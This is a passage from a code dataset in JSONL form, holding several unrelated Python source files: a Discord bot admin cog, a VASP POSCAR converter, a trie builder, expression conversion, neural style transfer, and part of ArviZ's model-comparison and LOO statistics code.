ephemeral=True)\r\n\r\n\r\n @commands.slash_command(name=\"setcolorrole\", description=\"Изменить цвет роли\")\r\n @commands.has_permissions(administrator=True)\r\n async def set_color_role(ctx, role: disnake.Role, color: str = None):\r\n if color is not None:\r\n try:\r\n color = disnake.Color(int(color.lstrip('#'), 16))\r\n except ValueError:\r\n embed = disnake.Embed(title='Ошибка', description='Некорректный формат цвета. Цвет должен быть указан в HEX-формате (например, #ff0000)', color=0xff0000)\r\n await ctx.send(embed=embed, ephemeral=True)\r\n return\r\n else:\r\n color = disnake.Color.random()\r\n\r\n await role.edit(color=color)\r\n\r\n embed = disnake.Embed(title='Цвет изменен', color=0xCD853F)\r\n embed.add_field(name='Роль', value=role.mention)\r\n embed.add_field(name='Цвет', value=f'#{color.value:06x}')\r\n\r\n await ctx.send(embed=embed, ephemeral=True)\r\n\r\n\r\n @commands.guild_only()\r\n @commands.slash_command(\r\n name=\"voting\", \r\n description=\"Провести голосование\",\r\n options=[\r\n disnake.Option(\"text\", \"Введите текст!\", required=True)\r\n ]\r\n )\r\n @commands.has_permissions(administrator=True)\r\n async def poll(self, ctx, *, text):\r\n await ctx.channel.purge(limit=1)\r\n poll = disnake.Embed(description=text, colour=randint(0, 0xCD853F))\r\n poll.timestamp = datetime.utcnow()\r\n msg = await ctx.channel.send(embed=poll)\r\n await msg.add_reaction(\"✔\")\r\n await msg.add_reaction(\"❌\")\r\n\r\n\r\n\r\n @commands.slash_command(name=\"send-dm\", description=\"Отправить в лс сообщение от имени бота\")\r\n @commands.has_permissions(administrator=True)\r\n @commands.guild_only()\r\n async def send(self, ctx, member: disnake.Member, *, text):\r\n embed = disnake.Embed(title=\"Обращение к вам!\", color=disnake.Color.dark_red())\r\n embed.add_field(name=\"Сообщение:\", value=text)\r\n embed.set_thumbnail(url=ctx.bot.user.display_avatar)\r\n await member.send(embed=embed)\r\n\r\n success_embed = disnake.Embed(title=\"Сообщение отправлено!\",\r\n description=f\"Успешно отправил участнику {member.mention}\",\r\n color=0xCD853F)\r\n await ctx.send(embed=success_embed, ephemeral=True)\r\n\r\n \r\ndef setup(bot: commands.Bot):\r\n bot.add_cog(admins(bot))","repo_name":"kamil12-dev/Polina_bot","sub_path":"cogs/admins.py","file_name":"admins.py","file_ext":"py","file_size_in_byte":13999,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72293740854","text":"from numpy import array,dot\r\nfrom numpy.linalg import inv\r\nfrom getopt import getopt\r\nimport sys\r\n \r\ndef remove_seldyn(ifile,ofile):\r\n try:\r\n lv, coord, atomtypes, atomnums, seldyn = parse_poscar(ifile)\r\n except ValueError:\r\n lv, coord, atomtypes, atomnums = parse_poscar(ifile)\r\n write_poscar(ofile, lv, coord, atomtypes, atomnums)\r\n\r\ndef parse_poscar(ifile):\r\n with open(ifile, 'r') as file:\r\n lines=file.readlines()\r\n sf=float(lines[1])\r\n latticevectors=[float(lines[i].split()[j])*sf for i in range(2,5) for j in range(3)]\r\n latticevectors=array(latticevectors).reshape(3,3)\r\n atomtypes=lines[5].split()\r\n atomnums=[int(i) for i in lines[6].split()]\r\n if lines[7].split()[0] == 'Direct':\r\n start=8\r\n else:\r\n start=9\r\n seldyn=[''.join(lines[i].split()[-3:]) for i in range(start,sum(atomnums)+start)]\r\n coord=array([[float(lines[i].split()[j]) for j in range(3)] for i in range(start,sum(atomnums)+start)])\r\n for i in range(sum(atomnums)):\r\n coord[i]=dot(latticevectors,coord[i])\r\n \r\n #latticevectors formatted as a 3x3 array\r\n #coord holds the atomic coordinates with shape ()\r\n try:\r\n return latticevectors, coord, atomtypes, atomnums, seldyn\r\n except NameError:\r\n return latticevectors, coord, atomtypes, atomnums\r\n\r\ndef write_poscar(ofile, lv, coord, atomtypes, atomnums, **args):\r\n with open(ofile,'w') as file:\r\n if 'title' in args:\r\n file.write(str(args['title']))\r\n file.write('\\n1.0\\n')\r\n for i in range(3):\r\n for j in range(3):\r\n file.write(str('{:<018f}'.format(lv[i][j])))\r\n if j<2:\r\n file.write(' ')\r\n file.write('\\n')\r\n for i in atomtypes:\r\n file.write(' '+str(i))\r\n file.write('\\n')\r\n for i in atomnums:\r\n file.write(' '+str(i))\r\n file.write('\\n')\r\n if 'seldyn' in args:\r\n file.write('Selective Dynamics\\n')\r\n file.write('Direct\\n')\r\n lv=inv(lv)\r\n for i in range(len(coord)):\r\n coord[i]=dot(lv,coord[i])\r\n for j in range(3):\r\n if coord[i][j]>1.0:\r\n coord[i][j]-=1.0\r\n for i in range(len(coord)):\r\n for j in range(3):\r\n file.write(str('{:<018f}'.format(coord[i][j])))\r\n if j<2:\r\n file.write(' ')\r\n if 'seldyn' in args:\r\n for j in range(3):\r\n file.write(' ')\r\n file.write(args['seldyn'][i][j])\r\n file.write('\\n')\r\n print('new POSCAR written to: '+str(ofile))\r\n \r\nif __name__ == '__main__':\r\n ifile='./POSCAR'\r\n ofile='./POSCAR_seldyn'\r\n short_opts='hi:o:'\r\n long_opts=['help','input=','output=']\r\n try:\r\n opts,args=getopt(sys.argv[1:],short_opts,long_opts)\r\n except getopt.GetoptError:\r\n print('error in command line syntax')\r\n sys.exit(2)\r\n for i,j in opts:\r\n if i in ['-h','--help']:\r\n print('''\r\nNote: for options with multiple values, seperate the values with commas\r\n \r\nthese options take a value:\r\n -i, --input specify an input other than ./POSCAR\r\n -o, --output speicfy an output other than ./POSCAR_seldyn\r\nhelp options:\r\n -h, --help display this error message\r\n''')\r\n sys.exit()\r\n if i in ['-i','--input']:\r\n ifile=j\r\n if i in ['-o','--output']:\r\n ofile=j\r\n try:\r\n remove_seldyn(ifile,ofile)\r\n except FileNotFoundError:\r\n print('error reading input. exiting...')\r\n sys.exit(1)","repo_name":"benwmcdowell/VASP_POSCAR_methods","sub_path":"remove_seldyn.py","file_name":"remove_seldyn.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"16774687069","text":"import argparse\n\nfrom util.prepare_data import prepare_train_data\nfrom service.train_service import train_classifier\n\n\ndef main():\n # Pass the model name and number of epochs as arguments\n parser = argparse.ArgumentParser(description='Train a face recognition model')\n parser.add_argument('--dataset', type=str, default='data/dataset', help='Path to the dataset')\n parser.add_argument('--model', type=int, help='Model to train', required=True)\n parser.add_argument('--epochs', type=int, default=20, help='Number of epochs to train for')\n parser.add_argument('--patience', type=int, default=10, help='Number of epochs to wait for improvement')\n\n inpout = parser.parse_args()\n args = prepare_train_data(inpout.model, inpout.dataset)\n\n train_classifier(args, inpout.epochs, inpout.patience)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"vvitzilaios/faceRecognition","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29566678011","text":"# This is a sample Python script.\nimport sys\n# Press ⌃R to execute it or replace it with your code.\n# Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.\n\n\ndef TrieConstruction(Patterns):\n count = 0\n root = TrieNode(\"\", count)\n count += 1\n for pattern in Patterns:\n currentNode = root\n for c in pattern:\n if c not in currentNode.children.keys():\n currentNode.children[c] = TrieNode(c,count)\n count += 1\n currentNode = currentNode.children.get(c)\n currentNode.is_end = True\n return root\n\n\n#class from github\nclass TrieNode:\n \"\"\"A node in the trie structure\"\"\"\n\n def __init__(self, char, count):\n # the character stored in this node\n self.char = char\n\n # whether this can be the end of a word\n self.is_end = False\n\n # a counter indicating how many nodes have been inserted\n self.counter = count\n\n # a dictionary of child nodes\n # keys are characters, values are nodes\n self.children = {}\n\n def print(self, prev):\n\n print(str(prev) + \" \" + str(self.counter) + \" \" + self.char)\n for n in self.children.values():\n n.print(self.counter)\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n filePath = input()\n inFile = open(filePath)\n patterns = []\n for line in inFile:\n patterns.extend(line.split())\n inFile.close()\n trie = TrieConstruction(patterns)\n f = open(\"output.txt\", 'w')\n sys.stdout = f\n for node in trie.children.values():\n node.print(0)\n f.close()\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"alexkubicek/TrieConstruction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21348806023","text":"from stack import Stack\nimport operator\n\ndef infix_to_postfix(lst):\n\texpression = ''\n\tprecedense = {'+':1, '-':1, '*':2, '/':2}\n\tstack = Stack()\n\tfor item in lst:\n\t\tif item in precedense:\n\t\t\twhile (stack.top() == 'empty') or (stack.top() in ['(', '{', '[']) or (precedense[stack.top()] >= precedense[item]):\n\t\t\t\tif stack.top() in ['(', '{', '[']:\n\t\t\t\t\tbreak\n\t\t\t\tk = stack.pop()\n\t\t\t\tif k == 'empty':\n\t\t\t\t\tbreak\n\t\t\t\t\t\n\t\t\t\texpression = expression+k\n\t\t\tstack.push(item)\n\t\telif (item in [')', '}', ']']):\n\t\t\twhile stack.top() not in ['(', '{', '[']:\n\t\t\t\texpression = expression+stack.pop()\n\t\t\telse:\n\t\t\t\tstack.pop()\n\t\telif item in ['(', '{', '[']:\n\t\t\tstack.push(item)\n\t\t\t\n\t\telse:\n\t\t\texpression = expression+item\n\t\t\t\n\twhile stack.top() != 'empty':\n\t\texpression=expression+stack.pop()\n\t\t\n\treturn expression\n\t\ndef postfix_evaluation(lst):\n\tstack = Stack()\n\tprecedense = {'+':operator.add, '-':operator.sub, '*':operator.mul, '/':operator.truediv}\n\tfor item in lst:\n\t\tif item in precedense:\n\t\t\ti = stack.pop()\n\t\t\tj = stack.pop()\n\t\t\tstack.push(precedense[item](int(j),int(i)))\n\t\telse:\n\t\t\tstack.push(item)\n\t\t\t\n\treturn stack.pop()\n\n\t\t\t\n\n\t\t\t\n\t\t\t\n\t\t \n\t\t\n","repo_name":"0snowden0/Codes","sub_path":"DSA/expression_evaluation_and_conversion.py","file_name":"expression_evaluation_and_conversion.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18014927795","text":"from PyQt5.QtWidgets import *\nfrom PyQt5 import QtCore\n\n\n# Shows information about project and developer\nclass About(QDialog):\n\n def __init__(self):\n super().__init__()\n\n self.setWindowTitle(\"About\")\n\n self.layout = QVBoxLayout()\n\n # Project name\n self._git = QLabel(\"2019 Frevo\")\n self._git.setOpenExternalLinks(True)\n self._git.setAlignment(QtCore.Qt.AlignCenter)\n self.layout.addWidget(self._git)\n\n # Developer\n self._developer = QLabel(\"by Mat Muller\")\n self._developer.setOpenExternalLinks(True)\n self._developer.setAlignment(QtCore.Qt.AlignCenter)\n self.layout.addWidget(self._developer)\n\n # Version\n self._developer = QLabel(\"v1.0.1\")\n self._developer.setOpenExternalLinks(True)\n self._developer.setAlignment(QtCore.Qt.AlignCenter)\n self.layout.addWidget(self._developer)\n\n self.setLayout(self.layout)\n\n self.exec_()\n self.activateWindow()\n","repo_name":"matuzalemmuller/Frevo","sub_path":"frevo/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"41549656915","text":"from loss import *\nfrom model import *\nfrom utils import *\n\nTensor = torch.tensor\n\n\nclass Optimizing:\n def __init__(self, device, alpha=-2, beta=9, iterations=500, lr=1):\n self.STYLE_WEIGHT = beta * np.array([1.50, 0.80, 0.25, 0.25, 0.25]) # what if make this vary? the later, the haigher for the deeper\n self.CONTENT_WEIGHT = alpha * np.array([1])\n self.LEARNING_RATE = lr\n self.CONTENT_PATH = 'images/content.jpg'\n self.STYLE_PATH = 'images/style.jpg'\n self.RESULT_PATH = 'result.jpg'\n self.MAX_ITERATIONS = iterations\n self.SHOW_ITERATIONS = 50\n self.DEVICE = device\n\n def load_images(self, from_content=True):\n content_image = load_img(self.CONTENT_PATH).to(self.DEVICE)\n style_image = load_img(self.STYLE_PATH).to(self.DEVICE)\n if from_content:\n result_image = content_image.clone()\n result_image.requires_grad = True\n\n return content_image, style_image, result_image\n\n def save_result(self):\n show_img(self.result_image).save(self.RESULT_PATH)\n\n def style_transfer(self):\n model = NSTModel()\n model.to(self.DEVICE)\n content_image, style_image, result_image = self.load_images()\n optim = torch.optim.LBFGS([result_image], lr=self.LEARNING_RATE)\n\n style_targets = [GramMatrix()(A).detach() for A in model(style_image)[0]]\n content_targets = [A.detach() for A in model(content_image)[1]]\n\n n_iterations = [0] # avoid error due to locality\n while n_iterations[0] <= self.MAX_ITERATIONS:\n def closure():\n optim.zero_grad()\n style_outputs, content_outputs = model(result_image)\n content_loss = [self.CONTENT_WEIGHT[i] * ContentLoss()(Y, content_targets[i]) for i, Y in enumerate(content_outputs)]\n style_loss = [self.STYLE_WEIGHT[i] * GramMSELoss()(Y, style_targets[i]) for i, Y in enumerate(style_outputs)]\n\n loss = sum(content_loss + style_loss)\n loss.backward()\n\n n_iterations[0] += 1\n if n_iterations[0] % self.SHOW_ITERATIONS == (self.SHOW_ITERATIONS - 1):\n print('Iteration: %d, Style Loss: %.4f, Content Loss: %.4f' % (n_iterations[0], sum(style_loss).item(), sum(content_loss).item()))\n return loss\n\n optim.step(closure)\n self.result_image = result_image\n return result_image\n","repo_name":"yuchen-xiyue/NSTExperiment","sub_path":"nst_/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19373756910","text":"from pathlib import Path\nimport logging\n\nimport h5py\n\nfrom ptychodus.api.plugins import PluginRegistry\nfrom ptychodus.api.scan import Scan, ScanFileReader, ScanPoint, ScanPointParseError, TabularScan\n\nlogger = logging.getLogger(__name__)\n\n\nclass PtychoShelvesScanFileReader(ScanFileReader):\n\n def read(self, filePath: Path) -> Scan:\n pointList = list()\n\n try:\n with h5py.File(filePath, 'r') as h5File:\n try:\n ppX = h5File['/ppX']\n ppY = h5File['/ppY']\n except KeyError:\n logger.debug('Unable to find data.')\n else:\n if ppX.shape == ppY.shape:\n logger.debug(f'Coordinate arrays have shape {ppX.shape}.')\n else:\n raise ScanPointParseError('Coordinate array shape mismatch!')\n\n for x, y in zip(ppX, ppY):\n point = ScanPoint(x, y)\n pointList.append(point)\n except OSError:\n logger.debug(f'Unable to read file \\\"{filePath}\\\".')\n\n return TabularScan.createFromPointIterable(pointList)\n\n\ndef registerPlugins(registry: PluginRegistry) -> None:\n registry.scanFileReaders.registerPlugin(\n PtychoShelvesScanFileReader(),\n simpleName='PtychoShelves',\n displayName='PtychoShelves Scan Position Files (*.h5 *.hdf5)')\n","repo_name":"AdvancedPhotonSource/ptychodus","sub_path":"ptychodus/plugins/ptychoShelvesScanFile.py","file_name":"ptychoShelvesScanFile.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"70310240374","text":"# pylint: disable=too-many-lines\n\"\"\"Generic and miscellanea statistical functions in ArviZ.\"\"\"\n\nimport itertools\nimport logging\nimport warnings\nfrom copy import deepcopy\nfrom typing import Callable, List, Mapping, Optional, Tuple, Union, cast\n\nimport numpy as np\nimport pandas as pd\nimport scipy.stats as st\nimport xarray as xr\nfrom datatree import DataTree\nfrom scipy.optimize import minimize\nfrom typing_extensions import Literal\nfrom xarray_einstats import stats\n\nNO_GET_ARGS: bool = False\ntry:\n from typing_extensions import get_args\nexcept ImportError:\n NO_GET_ARGS = True\n\nfrom arviz_base import convert_to_dataset, convert_to_datatree, extract, rcParams, xarray_var_iter\nfrom arviz_base.labels import BaseLabeller\nfrom arviz_base.rcparams import ICKeyword, ScaleKeyword\nfrom arviz_base.utils import _get_coords, _var_names\n\nfrom ..utils import ELPDData\nfrom ..utils import get_log_likelihood as _get_log_likelihood\nfrom .diagnostics import _mc_error, _multichain_statistics, ess\nfrom .intervals import hdi\nfrom .stats_utils import logsumexp as _logsumexp\nfrom .stats_utils import make_ufunc as _make_ufunc\nfrom .stats_utils import smooth_data\nfrom .stats_utils import wrap_xarray_ufunc as _wrap_xarray_ufunc\n\n_log = logging.getLogger(__name__)\n\n\n__all__ = [\n \"compare\",\n \"loo\",\n \"loo_pit\",\n \"psislw\",\n \"r2_samples\",\n \"r2_score\",\n \"summary\",\n \"waic\",\n \"weight_predictions\",\n \"_calculate_ics\",\n]\n\n\ndef compare(\n compare_dict: Mapping[str, DataTree],\n ic: Optional[ICKeyword] = None,\n method: Literal[\"stacking\", \"BB-pseudo-BMA\", \"pseudo-BMA\"] = \"stacking\",\n b_samples: int = 1000,\n alpha: float = 1,\n seed=None,\n scale: Optional[ScaleKeyword] = None,\n var_name: Optional[str] = None,\n):\n r\"\"\"Compare models based on their expected log pointwise predictive density (ELPD).\n\n The ELPD is estimated either by Pareto smoothed importance sampling leave-one-out\n cross-validation (LOO) or using the widely applicable information criterion (WAIC).\n We recommend loo. Read more theory here - in a paper by some of the\n leading authorities on model comparison dx.doi.org/10.1111/1467-9868.00353\n\n Parameters\n ----------\n compare_dict: dict of {str: InferenceData or ELPDData}\n A dictionary of model names and :class:`arviz.InferenceData` or ``ELPDData``.\n ic: str, optional\n Method to estimate the ELPD, available options are \"loo\" or \"waic\". Defaults to\n ``rcParams[\"stats.information_criterion\"]``.\n method: str, optional\n Method used to estimate the weights for each model. Available options are:\n\n - 'stacking' : stacking of predictive distributions.\n - 'BB-pseudo-BMA' : pseudo-Bayesian Model averaging using Akaike-type\n weighting. The weights are stabilized using the Bayesian bootstrap.\n - 'pseudo-BMA': pseudo-Bayesian Model averaging using Akaike-type\n weighting, without Bootstrap stabilization (not recommended).\n\n For more information read https://arxiv.org/abs/1704.02030\n b_samples: int, optional default = 1000\n Number of samples taken by the Bayesian bootstrap estimation.\n Only useful when method = 'BB-pseudo-BMA'.\n Defaults to ``rcParams[\"stats.ic_compare_method\"]``.\n alpha: float, optional\n The shape parameter in the Dirichlet distribution used for the Bayesian bootstrap. Only\n useful when method = 'BB-pseudo-BMA'. When alpha=1 (default), the distribution is uniform\n on the simplex. A smaller alpha will keeps the final weights more away from 0 and 1.\n seed: int or np.random.RandomState instance, optional\n If int or RandomState, use it for seeding Bayesian bootstrap. Only\n useful when method = 'BB-pseudo-BMA'. Default None the global\n :mod:`numpy.random` state is used.\n scale: str, optional\n Output scale for IC. Available options are:\n\n - `log` : (default) log-score (after Vehtari et al. (2017))\n - `negative_log` : -1 * (log-score)\n - `deviance` : -2 * (log-score)\n\n A higher log-score (or a lower deviance) indicates a model with better predictive\n accuracy.\n var_name: str, optional\n If there is more than a single observed variable in the ``InferenceData``, which\n should be used as the basis for comparison.\n\n Returns\n -------\n A DataFrame, ordered from best to worst model (measured by the ELPD).\n The index reflects the key with which the models are passed to this function. The columns are:\n rank: The rank-order of the models. 0 is the best.\n elpd: ELPD estimated either using (PSIS-LOO-CV `elpd_loo` or WAIC `elpd_waic`).\n Higher ELPD indicates higher out-of-sample predictive fit (\"better\" model).\n If `scale` is `deviance` or `negative_log` smaller values indicates\n higher out-of-sample predictive fit (\"better\" model).\n pIC: Estimated effective number of parameters.\n elpd_diff: The difference in ELPD between two models.\n If more than two models are compared, the difference is computed relative to the\n top-ranked model, that always has a elpd_diff of 0.\n weight: Relative weight for each model.\n This can be loosely interpreted as the probability of each model (among the compared model)\n given the data. By default the uncertainty in the weights estimation is considered using\n Bayesian bootstrap.\n SE: Standard error of the ELPD estimate.\n If method = BB-pseudo-BMA these values are estimated using Bayesian bootstrap.\n dSE: Standard error of the difference in ELPD between each model and the top-ranked model.\n It's always 0 for the top-ranked model.\n warning: A value of 1 indicates that the computation of the ELPD may not be reliable.\n This could be indication of WAIC/LOO starting to fail see\n http://arxiv.org/abs/1507.04544 for details.\n scale: Scale used for the ELPD.\n\n Examples\n --------\n Compare the centered and non centered models of the eight school problem:\n\n .. ipython::\n\n In [1]: import arviz as az\n ...: data1 = az.load_arviz_data(\"non_centered_eight\")\n ...: data2 = az.load_arviz_data(\"centered_eight\")\n ...: compare_dict = {\"non centered\": data1, \"centered\": data2}\n ...: az.compare(compare_dict)\n\n Compare the models using PSIS-LOO-CV, returning the ELPD in log scale and calculating the\n weights using the stacking method.\n\n .. ipython::\n\n In [1]: az.compare(compare_dict, ic=\"loo\", method=\"stacking\", scale=\"log\")\n\n See Also\n --------\n loo :\n Compute the ELPD using the Pareto smoothed importance sampling Leave-one-out\n cross-validation method.\n waic : Compute the ELPD using the widely applicable information criterion.\n plot_compare : Summary plot for model comparison.\n\n References\n ----------\n .. [1] Vehtari, A., Gelman, A. & Gabry, J. Practical Bayesian model evaluation using\n leave-one-out cross-validation and WAIC. Stat Comput 27, 1413–1432 (2017)\n see https://doi.org/10.1007/s11222-016-9696-4\n\n \"\"\"\n try:\n (ics_dict, scale, ic) = _calculate_ics(compare_dict, scale=scale, ic=ic, var_name=var_name)\n except Exception as err:\n raise err.__class__(\"Encountered error in ELPD computation of compare.\") from err\n names = list(ics_dict.keys())\n if ic == \"loo\":\n df_comp = pd.DataFrame(\n index=names,\n columns=[\n \"rank\",\n \"elpd_loo\",\n \"p_loo\",\n \"elpd_diff\",\n \"weight\",\n \"se\",\n \"dse\",\n \"warning\",\n \"scale\",\n ],\n dtype=np.float_,\n )\n elif ic == \"waic\":\n df_comp = pd.DataFrame(\n index=names,\n columns=[\n \"rank\",\n \"elpd_waic\",\n \"p_waic\",\n \"elpd_diff\",\n \"weight\",\n \"se\",\n \"dse\",\n \"warning\",\n \"scale\",\n ],\n dtype=np.float_,\n )\n else:\n raise NotImplementedError(f\"The information criterion {ic} is not supported.\")\n\n if scale == \"log\":\n scale_value = 1\n ascending = False\n else:\n if scale == \"negative_log\":\n scale_value = -1\n else:\n scale_value = -2\n ascending = True\n\n method = rcParams[\"stats.ic_compare_method\"] if method is None else method\n if method.lower() not in [\"stacking\", \"bb-pseudo-bma\", \"pseudo-bma\"]:\n raise ValueError(f\"The method {method}, to compute weights, is not supported.\")\n\n ic_i = f\"{ic}_i\"\n\n ics = pd.DataFrame.from_dict(\n {\n name: {\n f\"elpd_{ic}\": elpd_data.elpd,\n ic_i: elpd_data.elpd_i.values.flatten(),\n \"se\": elpd_data.se,\n }\n for name, elpd_data in ics_dict.items()\n },\n orient=\"index\",\n )\n ics.sort_values(by=f\"elpd_{ic}\", inplace=True, ascending=ascending)\n\n if method.lower() == \"stacking\":\n rows, cols, ic_i_val = _ic_matrix(ics, ic_i)\n exp_ic_i = np.exp(ic_i_val / scale_value)\n km1 = cols - 1\n\n def w_fuller(weights):\n return np.concatenate((weights, [max(1.0 - np.sum(weights), 0.0)]))\n\n def log_score(weights):\n w_full = w_fuller(weights)\n score = 0.0\n for i in range(rows):\n score += np.log(np.dot(exp_ic_i[i], w_full))\n return -score\n\n def gradient(weights):\n w_full = w_fuller(weights)\n grad = np.zeros(km1)\n for k, i in itertools.product(range(km1), range(rows)):\n grad[k] += (exp_ic_i[i, k] - exp_ic_i[i, km1]) / np.dot(exp_ic_i[i], w_full)\n return -grad\n\n theta = np.full(km1, 1.0 / cols)\n bounds = [(0.0, 1.0) for _ in range(km1)]\n constraints = [\n {\"type\": \"ineq\", \"fun\": lambda x: -np.sum(x) + 1.0},\n {\"type\": \"ineq\", \"fun\": np.sum},\n ]\n\n weights = minimize(\n fun=log_score, x0=theta, jac=gradient, bounds=bounds, constraints=constraints\n )\n\n weights = w_fuller(weights[\"x\"])\n ses = ics[\"se\"]\n\n elif method.lower() == \"bb-pseudo-bma\":\n rows, cols, ic_i_val = _ic_matrix(ics, ic_i)\n ic_i_val = ic_i_val * rows\n\n b_weighting = st.dirichlet.rvs(alpha=[alpha] * rows, size=b_samples, random_state=seed)\n weights = np.zeros((b_samples, cols))\n z_bs = np.zeros_like(weights)\n for i in range(b_samples):\n z_b = np.dot(b_weighting[i], ic_i_val)\n u_weights = np.exp((z_b - np.max(z_b)) / scale_value)\n z_bs[i] = z_b # pylint: disable=unsupported-assignment-operation\n weights[i] = u_weights / np.sum(u_weights)\n\n weights = weights.mean(axis=0)\n ses = pd.Series(z_bs.std(axis=0), index=names) # pylint: disable=no-member\n\n elif method.lower() == \"pseudo-bma\":\n min_ic = ics.iloc[0][f\"elpd_{ic}\"]\n z_rv = np.exp((ics[f\"elpd_{ic}\"] - min_ic) / scale_value)\n weights = z_rv / np.sum(z_rv)\n ses = ics[\"se\"]\n\n if np.any(weights):\n min_ic_i_val = ics[ic_i].iloc[0]\n for idx, val in enumerate(ics.index):\n res = ics.loc[val]\n if scale_value < 0:\n diff = res[ic_i] - min_ic_i_val\n else:\n diff = min_ic_i_val - res[ic_i]\n d_ic = np.sum(diff)\n d_std_err = np.sqrt(len(diff) * np.var(diff))\n std_err = ses.loc[val]\n weight = weights[idx]\n df_comp.loc[val] = (\n idx,\n res[f\"elpd_{ic}\"],\n ics_dict[val].p,\n d_ic,\n weight,\n std_err,\n d_std_err,\n ics_dict[val].warning,\n ics_dict[val].scale,\n )\n\n df_comp[\"rank\"] = df_comp[\"rank\"].astype(int)\n df_comp[\"warning\"] = df_comp[\"warning\"].astype(bool)\n return df_comp.sort_values(by=f\"elpd_{ic}\", ascending=ascending)\n\n\ndef _ic_matrix(ics, ic_i):\n \"\"\"Store the previously computed pointwise predictive accuracy values (ics) in a 2D matrix.\"\"\"\n cols, _ = ics.shape\n rows = len(ics[ic_i].iloc[0])\n ic_i_val = np.empty((rows, cols))\n\n for idx, val in enumerate(ics.index):\n ic = ics.loc[val][ic_i]\n\n if len(ic) != rows:\n raise ValueError(\"The number of observations should be the same across all models\")\n\n ic_i_val[:, idx] = ic\n\n return rows, cols, ic_i_val\n\n\ndef _calculate_ics(\n compare_dict,\n scale: Optional[ScaleKeyword] = None,\n ic: Optional[ICKeyword] = None,\n var_name: Optional[str] = None,\n):\n \"\"\"Calculate LOO or WAIC only if necessary.\n\n It always calls the ic function with ``pointwise=True``.\n\n Parameters\n ----------\n compare_dict : dict of {str : InferenceData or ELPDData}\n A dictionary of model names and InferenceData or ELPDData objects\n scale : str, optional\n Output scale for IC. Available options are:\n\n - `log` : (default) log-score (after Vehtari et al. (2017))\n - `negative_log` : -1 * (log-score)\n - `deviance` : -2 * (log-score)\n\n A higher log-score (or a lower deviance) indicates a model with better predictive accuracy.\n ic : str, optional\n Information Criterion (PSIS-LOO `loo` or WAIC `waic`) used to compare models.\n Defaults to ``rcParams[\"stats.information_criterion\"]``.\n var_name : str, optional\n Name of the variable storing pointwise log likelihood values in ``log_likelihood`` group.\n\n\n Returns\n -------\n compare_dict : dict of ELPDData\n scale : str\n ic : str\n\n \"\"\"\n precomputed_elpds = {\n name: elpd_data\n for name, elpd_data in compare_dict.items()\n if isinstance(elpd_data, ELPDData)\n }\n precomputed_ic = None\n precomputed_scale = None\n if precomputed_elpds:\n _, arbitrary_elpd = precomputed_elpds.popitem()\n precomputed_ic = arbitrary_elpd.kind\n precomputed_scale = arbitrary_elpd.scale\n raise_non_pointwise = arbitrary_elpd.elpd_i is None\n if any(elpd_data.kind != precomputed_ic for elpd_data in precomputed_elpds.values()):\n raise ValueError(\n \"All information criteria to be compared must be the same \"\n \"but found both loo and waic.\"\n )\n if any(elpd_data.scale != precomputed_scale for elpd_data in precomputed_elpds.values()):\n raise ValueError(\"All information criteria to be compared must use the same scale\")\n if (\n any(elpd_data.elpd_i is None for elpd_data in precomputed_elpds.values())\n or raise_non_pointwise\n ):\n raise ValueError(\"Not all provided ELPDData have been calculated with pointwise=True\")\n if ic is not None and ic.lower() != precomputed_ic:\n warnings.warn(\n \"Provided ic argument is incompatible with precomputed elpd data. \"\n f\"Using ic from precomputed ELPDData: {precomputed_ic}\"\n )\n ic = precomputed_ic\n if scale is not None and scale.lower() != precomputed_scale:\n warnings.warn(\n \"Provided scale argument is incompatible with precomputed elpd data. \"\n f\"Using scale from precomputed ELPDData: {precomputed_scale}\"\n )\n scale = precomputed_scale\n\n if ic is None and precomputed_ic is None:\n ic = cast(ICKeyword, rcParams[\"stats.information_criterion\"])\n elif ic is None:\n ic = precomputed_ic\n else:\n ic = cast(ICKeyword, ic.lower())\n allowable = [\"loo\", \"waic\"] if NO_GET_ARGS else get_args(ICKeyword)\n if ic not in allowable:\n raise ValueError(f\"{ic} is not a valid value for ic: must be in {allowable}\")\n\n if scale is None and precomputed_scale is None:\n scale = cast(ScaleKeyword, rcParams[\"stats.ic_scale\"])\n elif scale is None:\n scale = precomputed_scale\n else:\n scale = cast(ScaleKeyword, scale.lower())\n allowable = [\"log\", \"negative_log\", \"deviance\"] if NO_GET_ARGS else get_args(ScaleKeyword)\n if scale not in allowable:\n raise ValueError(f\"{scale} is not a valid value for scale: must be in {allowable}\")\n\n if ic == \"loo\":\n ic_func: Callable = loo\n elif ic == \"waic\":\n ic_func = waic\n else:\n raise NotImplementedError(f\"The information criterion {ic} is not supported.\")\n\n compare_dict = deepcopy(compare_dict)\n for name, dataset in compare_dict.items():\n if not isinstance(dataset, ELPDData):\n try:\n compare_dict[name] = ic_func(\n convert_to_datatree(dataset),\n pointwise=True,\n scale=scale,\n var_name=var_name,\n )\n except Exception as err:\n raise err.__class__(\n f\"Encountered error trying to compute {ic} from model {name}.\"\n ) from err\n return (compare_dict, scale, ic)\n\n\ndef loo(data, pointwise=None, var_name=None, reff=None, scale=None):\n \"\"\"Compute Pareto-smoothed importance sampling leave-one-out cross-validation (PSIS-LOO-CV).\n\n Estimates the expected log pointwise predictive density (elpd) using Pareto-smoothed\n importance sampling 